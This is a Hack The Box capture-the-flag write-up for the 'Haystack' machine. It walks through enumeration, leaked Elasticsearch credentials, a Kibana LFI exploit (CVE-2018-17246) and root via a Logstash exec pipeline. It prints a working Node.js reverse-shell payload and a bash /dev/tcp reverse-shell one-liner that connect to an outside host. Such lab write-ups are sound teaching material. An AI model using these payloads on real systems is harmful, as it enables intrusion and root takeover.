Haystack
Hack The Box
https://www.hackthebox.eu/home/machines/profile/195

Let’s start enumerating the box , with the port scan
# Nmap 7.70 scan initiated Sun Jun 30 00:33:22 2019 as: nmap -sC -sV -oA nmap.nmap 10.10.10.115
Nmap scan report for 10.10.10.115
Host is up (0.59s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp open http nginx 1.12.2
|_http-title: Site doesn’t have a title (text/html).
9200/tcp open http nginx 1.12.2
| http-methods:
|_ Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn’t have a title (application/json; charset=UTF-8)
So running nmap is telling us the following information:-
Port 22 -> SSH Server
Port 80 -> Web Server running on nginx
Port 9200-> Another Web Server running on nginx
So, if we browse the site on port 80 , we see an image of needle.

When we download and run the strings command on the image we see that there is a base64 encoded string at the end.

If we decode the base64 encoded string we get a Spanish phrase

On translating this string we get this :-
the needle in the haystack is "keyIf we try to enumerate more on this page, we get nothing else of interest
Now switching to web service at port 9200. There is json page on response from Elasticsearch server.

Now, since we know that there is Elasticsearch associated,so I looked for it’s documentation in there main page and came to know about there API _search

Now, if we look back we will see that we have also got a string like this.
the needle in the haystack is "keySo, we can interpret that we have to search for key in the whole stack. So I did this in the browser.
haystack.htb:9200/_search?q=clave

"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg""Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="
So, these are the two strings we got ( they both are in Spanish) and on translating it we get this.
“I have to keep the password for the machine: dXNlcjogc2VjdXJpdHkg”
“This key can not be lost, I keep it here: cGFzczogc3BhbmlzaC5pcy5rZXk=”

Now, we have username and password . Hence we can make a login to SSH .

Elevating privileges
Now we have logged in as security user, so on enumerating the box we see that there is a Kibana, running on the system.

Kibana is an open source data visualization plugin for Elasticsearch
Since Kibana service is running on the system,so there must be some port associated with it.
So, on doing netcat I found that it is not installed in the system. Hence I wrote the script to see if there are any more open ports on the localhost interface.
import socket
for p in range(65536):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = s.connect_ex(('localhost', p))
if r == 0:
print('Port ' + str(p) + ' is open')
s.close()
Hence, it is confirmed that Kibana service is running and on which port.
Now let’s port forward it to our local machine to see further


So, if we go to management tab we will see that the version of Kibana is Version: 6.4.2 and on looking forward to it in google we will see that it is subject to LFI.
https://github.com/mpgn/CVE-2018-17246
So there is a reverse shell payload,which we can we can include it via LFI.
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8089, "10.10.14.26", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();We could put this payload inside our machine and do curl to get the reverse shell.

Let’s hunt for root
On enumerating the box, I found that there Logstash is running as root. Logstash is another product by Elastic
So Logstash is used for data collection and pipe lining from various sources.
Logstash pipeline consists of 3 stages:-
Input → Filter → Output
Input
- generate events by for example reading a log file
Filters
- intermediary processing of events such as transformations
Outputs
- dispatch the filtered events to some output
In /etc/logstash/conf.d we see that there are 3 files as the same name above.
So let’s take a look at these files one by one

So , it is using file input plugin which is capable of generating events by reading files. If we look at the path variable, then we can say that it is reading the file of name starting with logstash_ in the /opt/kibana directory.
The stat_interval tells that it is reading file at the interval of every 10 seconds.
And each event generated by reading is tagged with type of “execute”.
Now looking at filter.conf

So, this is using grok plugin . This plugin is used to match the data passed from the input stage and put in into structured form.
Well, now any data that is been read by the input plugin is passed to match the pattern which is given at the message .
Let’s understand the pattern of the message:-
Ejecutar →The content of file should start with this.
“\s” means the white space, and “\s” is present with *, which means that there can be 0 or more white space.
comando → is a literal
“\s” is again present with * which means that there should be 0 or more white spaces.
“\s+” → Here \s is white space and + represent that there should be atleast one white space.
%{GREEDYDATA:comando} →So basically it is known as named capture group in regular expressions. So named capture groups look for data and put them in the variable.
Hence at last the final command is:-
Ejecutar comando : <command_to_execute>
OK, so now let’s move to the last file where the filter passes it contents

So, at first it is verifying the type, if the type is of tag “execute” then it would move forward else it will not.
Output file is using 2 plugins, stdout and exec
stdout :- this plugin tells us about the output that is to be presented to output screen. Here in the above the output would be of json format.
exec :- this plugin executes the command which it sees in command variable.
Now, we have covered all the 3 files functionality.
Let's look how we can use this file to get the root privileges.

If we see our background process we will see that, logstash is running as root and also /opt/kibana is writable ( from where input.conf is fetching the content)
Now, what we can do is create file logstash_k(logstash_*), so that input.conf could read the content from it.
echo “Ejecutar comando: bash -i >& /dev/tcp/<ip>/<port> 0>&1” > logstash_k.
So , what would happen is that the content would be read through input, filtered through filter.conf and output would be through output.conf.
So output.conf will trigger the shell and would give us the shell as root

Thanks for reading
HackTheBox Profile Link :-
https://www.hackthebox.eu/home/users/profile/67447
I have created an Auto-pwn script for this box, this would help to get the root of the box directly.
https://github.com/kush9408/Autopwn-Scripts